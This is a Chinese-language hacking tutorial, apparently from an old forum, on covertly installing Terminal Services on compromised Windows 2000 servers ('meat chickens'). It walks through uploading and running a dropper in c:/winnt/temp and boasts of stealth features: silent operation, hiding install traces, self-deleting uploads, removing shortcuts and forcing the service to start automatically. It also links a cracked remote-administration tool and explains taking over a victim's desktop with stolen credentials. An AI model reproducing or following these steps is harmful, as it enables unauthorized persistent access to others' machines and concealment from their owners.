解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:/winnt/temp下，然后进入c:/winnt/temp目录执行djxyxs.exe解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡会自动重启！重启后会出现终端服务！

特点：1、不用修改注册表的安装路径，注册表会自动修改，安装完后会自动恢复到原来的安装路径，2、在后台安静模式运行，就算肉鸡旁有人也没有关系！3、在添加和删除中看不出终端服务被安装的痕迹，也就是启动终端前不会打钩，4、不会在肉鸡上留下你的上传文件，在安装完终端服务后会会自动删除你上传到c:/winnt/temp下的任何文件！5、不管肉鸡的winnt装在什么盘上都无所谓！6、安装完终端后会删除在管理工具中的终端快捷图标！7、在没有安装终端前，终端服务是被禁止的！安装终端后，终端服务被改为自动！但是如果在安装前终端服务是手动！安装后就可能还是手动！等重启后就不会打开服务！所以在软件中加了sc指令，等安装完后，不管终端服务是禁止还是手动还是自动，全部改为自动。8、自动检测肉鸡是不是服务器版，如果不是删除原文件，不执行安装，如果是服务器版就执行安装！9、支持中日韩繁四个版本的win2000服务器版！

5，下载DameWare NT Utilities 3.66.0.0 注册版
地址www.netsill.com/dwmrcw36600.zip
安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。
复制启动后出现对方桌面。
在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入后在启动终端服务上打上勾。确定自动提示重起，重起后OK。